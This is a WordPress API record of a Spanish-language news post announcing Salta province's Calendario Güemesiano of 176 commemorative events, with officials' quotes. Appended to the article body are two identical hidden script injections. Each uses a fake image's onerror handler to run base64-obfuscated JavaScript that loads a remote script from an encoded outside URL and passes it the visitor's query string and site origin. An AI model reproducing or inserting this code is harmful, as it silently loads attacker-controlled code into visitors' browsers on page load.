{"id":4078,"date":"2024-06-04T15:53:08","date_gmt":"2024-06-04T18:53:08","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4078"},"modified":"2025-08-13T23:54:58","modified_gmt":"2025-08-14T02:54:58","slug":"calendario-guemesiano-176-eventos-en-15-municipios-para-conmemorar-el-legado-de-guemes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4078","title":{"rendered":"Calendario G\u00fcemesiano: 176 eventos en 15 municipios para conmemorar el legado de G\u00fcemes"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-0800ff93f4ab9483850cb1aa7a9ca318\" style=\"background-color:#ad0a32\"><em>Funcionarios provinciales brindaron detalles de las actividades que se realizar\u00e1n en homenaje al H\u00e9roe Gaucho.<\/em><\/h4>\n\n\n\n<p>El Gobierno provincial present\u00f3 hoy las actividades que est\u00e1n programadas en el Calendario G\u00fcemesiano, con la participaci\u00f3n de referentes de fortines, agrupaciones tradicionalistas, asociaciones e intendentes. Los secretarios de Turismo y de Cultura, Nadia Loza y Diego Ashur brindaron detalles de los 176 eventos que se desarrollar\u00e1n en 15 municipios y que pueden consultarse en\u00a0<a href=\"http:\/\/www.calendariosalta.gob.ar%20\/\">http:\/\/www.calendariosalta.gob.ar\u00a0<\/a>o en\u00a0<a href=\"http:\/\/www.visitsalta.ar%20\/\">http:\/\/www.visitsalta.ar\u00a0<\/a><\/p>\n\n\n\n<p>En la presentaci\u00f3n, que se realiz\u00f3 en el museo G\u00fcemes, la secretaria Nadia Loza indic\u00f3 \u201ceste mes para todos los salte\u00f1os es muy especial, conmemoramos el fallecimiento de nuestro General y todas estas actividades que son una invitaci\u00f3n para que salte\u00f1os y turistas puedan conocer su historia y de su legado. Cada vez m\u00e1s el turista est\u00e1 interesado en conocer nuestra historia, nuestra cultura y todo lo que signific\u00f3 G\u00fcemes para la Argentina\u201d y agreg\u00f3 que se continuar\u00e1 trabajando para posicionar este calendario que este a\u00f1o cuenta con 176 actividades en 15 municipios\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/06\/12419-presentacion-1024x576.jpg\" alt=\"\" class=\"wp-image-4079\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/06\/12419-presentacion-1024x576.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/06\/12419-presentacion-300x169.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/06\/12419-presentacion-768x432.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/06\/12419-presentacion-746x420.jpg 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/06\/12419-presentacion-696x392.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/06\/12419-presentacion.jpg 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Por su parte, el secretario de Cultura Diego Ashur se refiri\u00f3 al Pacto de G\u00fcemes convocado por el gobernador provincial y afirm\u00f3 \u201cnos convoca a la unidad, nos convoca a trabajar en conjunto. Y en ese esp\u00edritu es que estamos ac\u00e1, desde el sector cultural, desde el tur\u00edstico, que siempre hemos respetado ese tipo de esp\u00edritus, intendentes, agrupaciones tradicionalistas, porque estamos convencidos de que es un trabajo articulado, en consenso, con di\u00e1logo, con respeto, desde el que podemos construir\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/06\/12420-presentacion-1024x576.jpg\" alt=\"\" class=\"wp-image-4080\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/06\/12420-presentacion-1024x576.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/06\/12420-presentacion-300x169.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/06\/12420-presentacion-768x432.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/06\/12420-presentacion-746x420.jpg 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/06\/12420-presentacion-696x392.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/06\/12420-presentacion.jpg 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Los intendentes de San Lorenzo, Manuel Saravia y de Vaqueros Daniel Moreno se refirieron a las actividades en el interior de Salta e invitaron a salte\u00f1os y turistas a visitar los municipios. En tanto, el titular de la Agrupaci\u00f3n Tradicionalistas Gauchos de G\u00fcemes Julio de los R\u00edos detall\u00f3 las acciones que se llevar\u00e1n en relaci\u00f3n con la recepci\u00f3n de fortines y agrupaciones, la cabalgata a la Quebrada de la Horqueta, Guardia bajo las Estrellas y Desfile.<\/p>\n\n\n\n<p>Estuvieron presentes: presidente C\u00e1mara de Turismo Juan Lucero, intendente de San Lorenzo Manuel Saravia, presidente comisi\u00f3n Guardia Bajo las Estrellas Jorge Gianela; Fort\u00edn Martina Silva de Gurruchaga Gladys Ibarra; presidente del Ente de Turismo Fernando Garc\u00eda Soria, directora Museo del Regimiento 5to. Caballer\u00eda \u201cGral. G\u00fcemes\u201d, cuartel de los Infernales.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Calendario G\u00fcemesiano: 176 eventos en 15 municipios para conmemorar el legado de G\u00fcemes\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/ZYzDOf06H_s?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Funcionarios provinciales brindaron detalles de las actividades que se realizar\u00e1n en homenaje al H\u00e9roe Gaucho. El Gobierno provincial present\u00f3 hoy las actividades que est\u00e1n programadas en el Calendario G\u00fcemesiano, con la participaci\u00f3n de referentes de fortines, agrupaciones tradicionalistas, asociaciones e intendentes. Los secretarios de Turismo y de Cultura, Nadia Loza y Diego Ashur brindaron detalles [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4081,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,15],"tags":[],"class_list":{"0":"post-4078","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4078"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4078"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4078\/revisions"}],"predecessor-version":[{"id":6772,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4078\/revisions\/6772"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4081"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4078"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4078"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4078"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}